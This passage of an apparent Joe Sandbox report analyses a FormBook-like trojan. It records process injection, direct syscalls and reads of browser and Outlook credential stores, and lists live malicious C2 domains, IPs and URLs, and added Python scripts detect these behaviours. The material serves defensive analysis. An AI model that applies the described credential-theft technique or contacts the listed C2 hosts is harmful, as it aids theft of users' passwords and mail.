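exported Nt* stubs, so user-mode hooks placed on those stubs do not see it.
The check below is the one such a sensor performs: take the address the
syscall came from and look it up in the process's module list.
"""
import re

DIRECT_RE = re.compile(r"(?P<api>Nt\w+):\s*Direct from:\s*0x(?P<addr>[0-9A-Fa-f]+)")

# Constructed input: six of the report's 34 lines, including the lowest and
# highest addresses, with the process path shortened to its basename.
REPORT_LINES = [
    "Source: hEtOKWgxZfeL.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC",
    "Source: hEtOKWgxZfeL.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E",
    "Source: hEtOKWgxZfeL.exe NtWriteVirtualMemory: Direct from: 0x76EF490C",
    "Source: hEtOKWgxZfeL.exe NtSetInformationThread: Direct from: 0x76EE63F9",
    "Source: hEtOKWgxZfeL.exe NtMapViewOfSection: Direct from: 0x76EF2D1C",
    "Source: hEtOKWgxZfeL.exe NtCreateUserProcess: Direct from: 0x76EF371C",
]

# Hypothetical module map (name, base, size).  Replace with the loaded-module
# list of the process under analysis; the values here are NOT from the report.
MODULES = [
    ("hEtOKWgxZfeL.exe", 0x00400000, 0x00080000),
    ("ntdll.dll",        0x77D00000, 0x001A0000),
]


def parse_direct_syscalls(lines):
    """Return [(api, call-site address)] from the report lines."""
    return [(m["api"], int(m["addr"], 16))
            for m in map(DIRECT_RE.search, lines) if m]


def locate(addr, modules):
    """Name of the module whose image range contains addr, else None."""
    for name, base, size in modules:
        if base <= addr < base + size:
            return name
    return None


def classify(callsites, modules):
    """Map each (api, addr) to a verdict on how the syscall was reached."""
    verdicts = {}
    for api, addr in callsites:
        mod = locate(addr, modules)
        if mod is None:
            verdicts[(api, addr)] = "unbacked"      # stub in private memory: hook bypass
        elif mod.lower() == "ntdll.dll":
            verdicts[(api, addr)] = "ntdll"         # went through the exported stub
        else:
            verdicts[(api, addr)] = "other-module"  # syscall instruction in a non-ntdll image
    return verdicts


def cluster(callsites, window=0x10000):
    """Group call sites that lie within `window` bytes of each other.

    One tight cluster for dozens of different Nt* calls means one stub table
    (a copied ntdll or a generated syscall trampoline), not scattered inline
    syscalls."""
    groups = []
    for addr in sorted({a for _, a in callsites}):
        if groups and addr - groups[-1][1] < window:
            groups[-1][1] = addr
        else:
            groups.append([addr, addr])
    return [tuple(g) for g in groups]


if __name__ == "__main__":
    sites = parse_direct_syscalls(REPORT_LINES)
    for (api, addr), verdict in classify(sites, MODULES).items():
        print(f"{api:<28} 0x{addr:08X}  {verdict}")
    for lo, hi in cluster(sites):
        print(f"cluster 0x{lo:08X}-0x{hi:08X} ({hi - lo} bytes)")
```

Run over all 34 report lines the clustering gives the same single group: the lowest address (0x76EE63F9) and the highest (0x76EF490C) are 58643 bytes apart, well under the 64 KiB window, so every one of the 34 distinct calls is served from one contiguous stub region rather than from inline syscall instructions spread through the code.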
Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe, section loaded: NULL, target: C:\Windows\SysWOW64\svchost.exe, protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe, section loaded: NULL, target: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe, protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe, section loaded: NULL, target: C:\Windows\SysWOW64\rasdial.exe, protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe, section loaded: NULL, target: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe, protection: read write
Source: C:\Windows\SysWOW64\rasdial.exe, section loaded: NULL, target: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe, protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe, section loaded: NULL, target: C:\Program Files\Mozilla Firefox\firefox.exe, protection: read write
Source: C:\Windows\SysWOW64\rasdial.exe, section loaded: NULL, target: C:\Program Files\Mozilla Firefox\firefox.exe, protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe, thread register set, target process: 4676
Source: C:\Windows\SysWOW64\rasdial.exe, thread APC queued, target process: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe, memory written: C:\Windows\SysWOW64\svchost.exe, base: 2C12008
Source: C:\Users\user\Desktop\Purchase_Order_pdf.exe, process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase_Order_pdf.exe"
Source: C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe, process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
Source: C:\Windows\SysWOW64\rasdial.exe, process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: hEtOKWgxZfeL.exe, 00000004.00000000.2351949246.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485328030.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485604748.00000000012B1000.00000002.00000001.00040000.00000000.sdmp, binary or memory string: Program Manager
Source: hEtOKWgxZfeL.exe, 00000004.00000000.2351949246.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485328030.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485604748.00000000012B1000.00000002.00000001.00040000.00000000.sdmp, binary or memory string: Shell_TrayWnd
Source: hEtOKWgxZfeL.exe, 00000004.00000000.2351949246.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485328030.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485604748.00000000012B1000.00000002.00000001.00040000.00000000.sdmp, binary or memory string: Progman
Source: Purchase_Order_pdf.exe, binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: hEtOKWgxZfeL.exe, 00000004.00000000.2351949246.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000004.00000002.4485328030.0000000001911000.00000002.00000001.00040000.00000000.sdmp, hEtOKWgxZfeL.exe, 00000007.00000002.4485604748.00000000012B1000.00000002.00000001.00040000.00000000.sdmp, binary or memory string: Progmanlock
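The section-mapping, APC and process-creation lines above describe one injection chain, and two of them are the evidence behind the Sigma hits in the overview ("Uncommon Svchost Parent Process", "Suspicious RASdial Activity"). The following is an added example, not Joe Sandbox or SigmaHQ code: it rebuilds the chain as a graph from the report's lines (embedded as constructed input with paths shortened to basenames) and runs the process-creation checks over Sysmon Event ID 1 style records (Image, CommandLine, ParentImage) constructed from the report's "process created" lines and process tree; the third record is a hypothetical benign control.

```python
"""Rebuild the injection chain from the report's HIPS lines and run the
process-creation checks behind its Sigma hits.

Added example, not Joe Sandbox or Sigma code.  Report lines are constructed
(paths shortened to basenames); the event dicts use Sysmon EID 1 field names.
"""
import ntpath
import re

SECTION_RE = re.compile(
    r"Source:\s*(?P<src>\S+)\s*Section loaded: NULL target:\s*(?P<dst>.+?)"
    r"\s*protection:\s*(?P<prot>.+)$")
APC_RE = re.compile(r"Source:\s*(?P<src>\S+)\s*Thread APC queued: target process:\s*(?P<dst>.+)$")
WRITE_RE = re.compile(r"Source:\s*(?P<src>\S+)\s*Memory written:\s*(?P<dst>.+?)\s*base:")

# Constructed from the report's "HIPS / PFW" block.
REPORT_LINES = [
    "Source: Purchase_Order_pdf.exe Section loaded: NULL target: svchost.exe protection: execute and read and write",
    "Source: svchost.exe Section loaded: NULL target: hEtOKWgxZfeL.exe protection: execute and read and write",
    "Source: svchost.exe Section loaded: NULL target: rasdial.exe protection: execute and read and write",
    "Source: rasdial.exe Section loaded: NULL target: hEtOKWgxZfeL.exe protection: read write",
    "Source: rasdial.exe Section loaded: NULL target: hEtOKWgxZfeL.exe protection: execute and read and write",
    "Source: rasdial.exe Section loaded: NULL target: firefox.exe protection: read write",
    "Source: rasdial.exe Section loaded: NULL target: firefox.exe protection: execute and read and write",
    "Source: rasdial.exe Thread APC queued: target process: hEtOKWgxZfeL.exe",
    "Source: Purchase_Order_pdf.exe Memory written: svchost.exe base: 2C12008",
]

# Sysmon EID 1 style events: first two from the report's 'Process created'
# lines and process tree, the third a hypothetical benign control.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\Purchase_Order_pdf.exe"',
     "ParentImage": r"C:\Users\user\Desktop\Purchase_Order_pdf.exe"},
    {"Image": r"C:\Windows\SysWOW64\rasdial.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\rasdial.exe"',
     "ParentImage": r"C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]


def edges(lines):
    """Directed (source, target, technique) edges, one per observation."""
    out = []
    for line in lines:
        if m := SECTION_RE.search(line):
            out.append((m["src"], m["dst"].strip(), f"map section ({m['prot'].strip()})"))
        elif m := APC_RE.search(line):
            out.append((m["src"], m["dst"].strip(), "queue APC"))
        elif m := WRITE_RE.search(line):
            out.append((m["src"], m["dst"].strip(), "write memory"))
    return out


def chains(edge_list, root):
    """Every acyclic path from root along edges that can transfer execution
    (an executable mapping, an APC, or a memory write); RW-only mappings are
    data exchange and are skipped."""
    adj = {}
    for src, dst, tech in edge_list:
        if "execute" in tech or tech in ("queue APC", "write memory"):
            adj.setdefault(src, set()).add(dst)
    paths = []

    def walk(node, path):
        nxt = [n for n in adj.get(node, ()) if n not in path]
        if not nxt:
            paths.append(path)
        for n in sorted(nxt):
            walk(n, path + [n])

    walk(root, [root])
    return paths


def split_cmdline(cmdline):
    """(executable, arguments) from a Windows command line, quoted or not."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end > 0:
            return s[1:end], s[end + 1:].strip()
        return s[1:], ""
    exe, _, rest = s.partition(" ")
    return exe, rest.strip()


TRUSTED_SVCHOST_PARENTS = {"services.exe"}  # SigmaHQ's rule allows a few more


def process_create_findings(ev):
    """Findings for one Sysmon EID 1 style event."""
    image = ntpath.basename(ev["Image"]).lower()
    parent = ntpath.basename(ev["ParentImage"]).lower()
    exe, args = split_cmdline(ev["CommandLine"])
    claimed = ntpath.basename(exe).lower()
    findings = []
    if claimed != image:
        # CreateProcess(lpApplicationName=svchost.exe, lpCommandLine=<sample>):
        # the image on disk is svchost.exe but the command line names the
        # dropper.  That mismatch is the hollowing tell behind the report's
        # 'Process created: svchost.exe "Purchase_Order_pdf.exe"' line.
        findings.append(f"image {image} does not match command line {claimed}")
    if image == "svchost.exe" and parent not in TRUSTED_SVCHOST_PARENTS:
        findings.append(f"svchost.exe spawned by {parent}")
    if image == "rasdial.exe" and not args:
        findings.append("rasdial.exe started without arguments")
    return findings


if __name__ == "__main__":
    for p in chains(edges(REPORT_LINES), "Purchase_Order_pdf.exe"):
        print(" -> ".join(p))
    for ev in EVENTS:
        print(ntpath.basename(ev["Image"]), process_create_findings(ev))
```

One further observation on the strings just above, an inference and not a report finding: the key-name table in Purchase_Order_pdf.exe (NUMPADENTER, BROWSER_BACK, LWINDOWN ... together with "Script Paused" and "Exit") is the Send()/hotkey string set of the AutoIt3 runtime, so the dropper is most likely an AutoIt-compiled loader that unpacks FormBook and hollows svchost.exe.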

Stealing of Sensitive Information

Source: Yara match, file source: 00000002.00000002.2433455475.00000000087B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.4485573273.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.4484572757.0000000000A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.4487012045.0000000004EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000002.2428914356.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000002.4485613681.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.4485647007.0000000000E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000002.2429698099.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rasdial.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\rasdial.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasdial.exe, file opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasdial.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\rasdial.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\rasdial.exe, file opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe, key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
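The file and key opens above are the two access patterns behind "Tries to harvest and steal browser information" and "Tries to steal Mail credentials". Chrome and Edge store saved passwords and cookies encrypted under a key that is itself DPAPI-wrapped inside Local State, so a stealer that wants usable passwords must read Login Data and Local State together; that pair, not either file alone, is the strong signal. The following is an added example, not Joe Sandbox code: a file-access classifier over (process, opened path) events constructed from the report's lines, with an allowlist of the processes that own those stores.

```python
"""Flag non-browser processes that open browser credential stores or the
Outlook profile key.  Added example, not Joe Sandbox code; the events are
constructed from the report's 'File opened' / 'Key opened' lines.
"""
import ntpath
import re

# (pattern, what the file holds).  Matched on the tail of the opened path so
# any drive letter and profile directory match.
STORE_PATTERNS = [
    (re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\Login Data$", re.I),
     "saved passwords (encrypted under the key kept in Local State)"),
    (re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\Local State$", re.I),
     "DPAPI-wrapped key that decrypts Login Data and Cookies"),
    (re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\Cookies$", re.I),
     "session cookies"),
    (re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\Web Data$", re.I),
     "autofill and card data"),
]
OUTLOOK_PROFILES = re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.I)

# Processes expected to touch their own stores; anything else is a finding.
BROWSER_OWNERS = {"chrome.exe", "msedge.exe"}
MAIL_OWNERS = {"outlook.exe"}

R = r"C:\Windows\SysWOW64\rasdial.exe"
CHROME = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
EDGE = r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default"
# Constructed from the report's nine access lines.
EVENTS = [
    (R, CHROME + r"\Cookies"),
    (R, CHROME + r"\Network\Cookies"),
    (R, CHROME + r"\Web Data"),
    (R, CHROME + r"\Login Data"),
    (R, EDGE + r"\Login Data"),
    (R, CHROME + r"\Local State"),
    (R, CHROME + r"\Network\Local State"),
    (R, EDGE + r"\Network\Cookies"),
    (R, r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
        r"\Windows Messaging Subsystem\Profiles\Outlook" + "\\"),
]


def classify_access(process, target):
    """Return a finding string or None for one (process, opened path/key)."""
    proc = ntpath.basename(process).lower()
    if OUTLOOK_PROFILES.search(target):
        return None if proc in MAIL_OWNERS else f"{proc} read Outlook profile store (mail credentials)"
    for pat, what in STORE_PATTERNS:
        if pat.search(target):
            return None if proc in BROWSER_OWNERS else f"{proc} opened {ntpath.basename(target)}: {what}"
    return None


def findings(events):
    """Distinct findings, in first-seen order, for (process, path) events."""
    out = []
    for proc, target in events:
        f = classify_access(proc, target)
        if f and f not in out:
            out.append(f)
    return out


def full_password_theft(events):
    """Processes (not browsers) that read both Login Data and Local State."""
    seen = {}
    for proc, target in events:
        p = ntpath.basename(proc).lower()
        if p in BROWSER_OWNERS:
            continue
        tail = ntpath.basename(target).lower()
        if tail in ("login data", "local state"):
            seen.setdefault(p, set()).add(tail)
    return {p for p, s in seen.items() if {"login data", "local state"} <= s}


if __name__ == "__main__":
    for f in findings(EVENTS):
        print(f)
    print("password theft capable:", full_password_theft(EVENTS))
```

The report's process opens Local State under Default\ and Default\Network\ rather than at the User Data root where the real file lives; the pattern deliberately matches any depth so both the probe and the real read are caught.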

Remote Access Functionality

Source: Yara match, file sources: the same eight memory dumps listed under Stealing of Sensitive Information (type: MEMORY)
MITRE ATT&CK Matrix (Joe Sandbox layout: one column per tactic with six techniques each; a number in front of a technique is the report's hit count for it, techniques without a number had no hit)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 2 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Software Packing; Steganography
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 111 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Email Collection; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID 1545090, sample Purchase_Order_pdf.exe, start date 30/10/2024, architecture WINDOWS, score 100)

Top-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); 5 other signatures
Top-level DNS/IP: www.ngmr.xyz; www.huyven.xyz (Performs DNS queries to domains with low reputation); 18 other IPs or domains

Purchase_Order_pdf.exe (started)
  signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  -> svchost.exe (started)
       signatures: Maps a DLL or memory area into another process
       -> hEtOKWgxZfeL.exe (injected)
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            -> rasdial.exe (started)
                 signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                 -> hEtOKWgxZfeL.exe (injected)
                      DNS/IP: patioprojex.africa 197.189.237.186, ports 49991, 49992, 49993 (xneelo, ZA, South Africa); zhs.zohosites.com 136.143.186.12, ports 50023, 50024, 80 (ZOHO-AS, US, United States); 10 other IPs or domains
                      signatures: Found direct / indirect Syscall (likely to bypass EDR)
                 -> firefox.exe (started)

Antivirus detection, initial sample:
Source | Detection | Scanner | Label
Purchase_Order_pdf.exe | 42% | ReversingLabs | Win32.Trojan.Swotter
Purchase_Order_pdf.exe | 100% | Joe Sandbox ML |
Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches

Antivirus detection, domains:
Source | Detection | Scanner
www.huyven.xyz | 1% | Virustotal
www.fieldelse.net | 6% | Virustotal
www.ngmr.xyz | 1% | Virustotal
galaxyslot88rtp.lat | 2% | Virustotal

Antivirus detection, URLs:
Source | Detection | Scanner | Label
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
Domains (the Antivirus Detection column is empty for every row):
Name | IP | Active | Malicious | Reputation
www.huyven.xyz | 162.0.238.246 | true | true | unknown
www.fieldelse.net | 18.141.10.107 | true | true | unknown
www.ngmr.xyz | 54.67.87.110 | true | true | unknown
galaxyslot88rtp.lat | 162.0.209.213 | true | true | unknown
zhs.zohosites.com | 136.143.186.12 | true | true | unknown
dto20.shop | 3.33.130.190 | true | true | unknown
patioprojex.africa | 197.189.237.186 | true | true | unknown
wdeb18.top | 206.119.82.147 | true | true | unknown
www.drivedoge.website | 195.161.68.8 | true | true | unknown
h5hph710am.site | 144.34.186.85 | true | true | unknown
www.dverkom.store | 31.31.196.17 | true | true | unknown
www.bayarcepat19.click | 188.114.97.3 | true | true | unknown
www.wdeb18.top | unknown | unknown | true | unknown
www.dto20.shop | unknown | unknown | true | unknown
www.h5hph710am.site | unknown | unknown | true | unknown
www.animekuid.xyz | unknown | unknown | true | unknown
www.lanxuanz.tech | unknown | unknown | true | unknown
www.longfilsalphonse.net | unknown | unknown | true | unknown
www.galaxyslot88rtp.lat | unknown | unknown | true | unknown
www.patioprojex.africa | unknown | unknown | true | unknown
URLs contacted (the Antivirus Detection column is empty for every row):
Name | Malicious | Reputation
http://www.patioprojex.africa/iv79/ | true | unknown
http://www.drivedoge.website/czka/ | true | unknown
http://www.wdeb18.top/jo6v/ | true | unknown
http://www.lanxuanz.tech/1q08/ | true | unknown
http://www.fieldelse.net/exug/ | true | unknown
http://www.huyven.xyz/dbbh/ | true | unknown
http://www.h5hph710am.site/ni9w/ | true | unknown
http://www.galaxyslot88rtp.lat/sfat/ | true | unknown
http://www.bayarcepat19.click/g48c/ | true | unknown
http://www.dto20.shop/zlyl/ | true | unknown
http://www.dverkom.store/fbcx/ | true | unknown
URLs found in memory or binary data:
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://jino.ru | rasdial.exe, 00000005.00000002.4486451389.00000000055C6000.00000004.10000000.00040000.00000000.sdmp; hEtOKWgxZfeL.exe, 00000007.00000002.4485691853.0000000003036000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.lanxuanz.tech | hEtOKWgxZfeL.exe, 00000007.00000002.4487012045.0000000004F46000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://www.ecosia.org/newtab/ | rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | rasdial.exe, 00000005.00000003.2609525103.00000000079BE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.0.238.246 | www.huyven.xyz | Canada | 22612 | NAMECHEAP-NETUS | true
136.143.186.12 | zhs.zohosites.com | United States | 2639 | ZOHO-ASUS | true
197.189.237.186 | patioprojex.africa | South Africa | 37153 | xneeloZA | true
188.114.97.3 | www.bayarcepat19.click | European Union | 13335 | CLOUDFLARENETUS | true
31.31.196.17 | www.dverkom.store | Russian Federation | 197695 | AS-REGRU | true
144.34.186.85 | h5hph710am.site | Canada | 25820 | IT7NETCA | true
54.67.87.110 | www.ngmr.xyz | United States | 16509 | AMAZON-02US | true
206.119.82.147 | wdeb18.top | United States | 174 | COGENT-174US | true
195.161.68.8 | www.drivedoge.website | Russian Federation | 8342 | RTCOMM-ASRU | true
162.0.209.213 | galaxyslot88rtp.lat | Canada | 35893 | ACPCA | true
18.141.10.107 | www.fieldelse.net | United States | 16509 | AMAZON-02US | true
3.33.130.190 | dto20.shop | United States | 8987 | AMAZONEXPANSIONGB | true
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1545090
                                                                    Start date and time:2024-10-30 04:54:26 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 6m 52s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:7
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:2
                                                                    Technologies:
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Purchase_Order_pdf.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@23/12
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
